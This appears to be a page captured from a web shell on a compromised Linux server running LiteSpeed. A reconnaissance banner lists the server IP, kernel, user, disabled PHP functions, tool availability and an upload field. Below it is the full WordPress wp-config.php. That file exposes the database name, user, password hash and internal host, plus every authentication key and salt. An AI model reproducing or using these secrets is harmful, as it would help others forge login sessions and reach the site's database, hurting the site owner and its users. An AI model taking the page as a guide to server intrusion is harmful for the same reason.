| Server IP : 150.230.34.123 / Your IP : 216.73.217.23 Web Server : LiteSpeed System : Linux amd-instance-20210802-1657 5.15.0-1042-oracle #48~20.04.1-Ubuntu SMP Mon Aug 21 18:27:46 UTC 2023 x86_64 User : ubuntu ( 1001) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/cwd/ |
Upload File : |
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', "aloysius_wp" );
/** MySQL database username */
define( 'DB_USER', "aloysius_wp_admin" );
/** MySQL database password */
define( 'DB_PASSWORD', "*42CB60D8A04EB23FE1B78A10BF66A12A2F4DADA6" );
/** MySQL hostname */
define( 'DB_HOST', "10.0.0.192" );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'g=Fwf]z_9[xq.I}|f UonqAQsRE<=%Rr*t6w%%{UR#B,*d{HKqe?yus7%mpgTwmZ' );
define( 'SECURE_AUTH_KEY', '0FLFEQnCzXA1u>StV[pzg|>/_E0*-g$n%/_eD>p1W1Ky$&/b0<pxl=z5bpY`!Qml' );
define( 'LOGGED_IN_KEY', 'OG-s8t@^`==ybAq1IG>(*Y9uRLV4aJ *CQjb?XsEqvya}HN*^DZTLB,B(UL0*rrz' );
define( 'NONCE_KEY', 'gI8Eumb>h<O4PR5o@JlpJuJU}nC/l1.j)Ber|AFB-`LKy_UT*pwm-QYFHLbfVVYb' );
define( 'AUTH_SALT', 'm+SAB&nY(]RI>5Y(>.|*[bZ_q |F#53.Y3?TMM#N/GOuP;d#02-.SC&tedmD=%wX' );
define( 'SECURE_AUTH_SALT', 'iI2voa-M>,ERV4;Gv)08wkT!C{WM6sjeAGu|Cw%V74_#-$RU+a(=(%L|6ELgUj<8' );
define( 'LOGGED_IN_SALT', 'qnE[vo6!E3EB&U[=UZHdBdhZ8OQ7|Hu:mU N8aWQY<b:6RO:8,jbT# wX`mo6Fb3' );
define( 'NONCE_SALT', 'Yc{NI/to(E9xaZa$TPliA)Hzws4b=p=`7LC,$qv)cNc6aEBc&[_MxaP^,W *Ys9`' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';